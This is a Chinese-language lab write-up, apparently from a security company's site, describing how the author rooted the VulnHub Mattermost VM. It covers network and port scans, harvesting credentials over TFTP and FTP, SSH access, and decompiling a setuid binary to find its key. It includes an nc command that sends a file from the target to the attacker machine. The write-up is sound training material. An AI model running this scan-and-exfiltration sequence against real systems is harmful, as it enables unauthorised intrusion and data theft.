网站导航

新闻资讯

当前位置:首页 > 新闻资讯

vulnhub之mattermost的实践

发布时间:2022-04-11

简要描述:

今天实践的是vulnhub的mattermost镜像,下载地址,https://download.vulnhub.com/enumbox/Mattermost.7z,用workstation导入成功,先做地址扫描,sudo netdiscover -r 192.168.137.0/...

详细介绍

今天实践的是vulnhub的mattermost镜像,下载地址,

https://download.vulnhub.com/enumbox/Mattermost.7z,

用workstation导入成功,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.53,


浏览器访问一下http://192.168.137.53:8065,需要用户名密码登录,

接下来的事情就比较尴尬了,竟然想到可能有udp的tftp服务,

扫描一下,真有,sudo nmap -sU -p 69 192.168.137.53,

登录,下载文件,tftp 192.168.137.53,

get README.md

quit

cat README.md

得到了用户名密码,Admin/ComplexPassword0!,登录8065的界面,

找到一个zoom插件的地方,使能插件后,得到一个url,

访问这个url,http://192.168.137.53/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html,

得到新的用户名密码,ftpuser/ftppassword,登录ftp,

ftp 192.168.137.53

ftpuser

ftppassword

dir

cd users

dir

cd mattermost

dir

get message

bye

cat message

又获取到新的用户名密码,mattermost/Welcome!!!,

这回能ssh登录,登录进去后发现了提示信息,但执行文件说key过期,

ls

cd Desktop

ls

cat README.md

./secret

想办法把secret文件搞出来,kali攻击机上nc -nlvp 1234 > secret,

靶机上,cat secret | nc 192.168.137.141 1234,

kali攻击机上安装反编译软件ghidra,

sudo apt update,sudo apt install ghidra,

cd /usr/share/ghidra,./ghidraRun,

反编译得到key,0xf447,转成10进制,62535,

这回再执行文件,输入正确的key,id一下确认是root,

 


推荐产品

如果您有任何问题,请跟我们联系!

联系我们

Copyright © 武汉网盾科技有限公司 版权所有 备案号:鄂ICP备2023003462号-5

地址:联系地址:湖北省武汉市东湖新技术开发区武大科技园兴业楼北楼1单元2层

在线客服 联系方式 二维码

服务热线

15527777548/18696195380

扫一扫,关注我们

关闭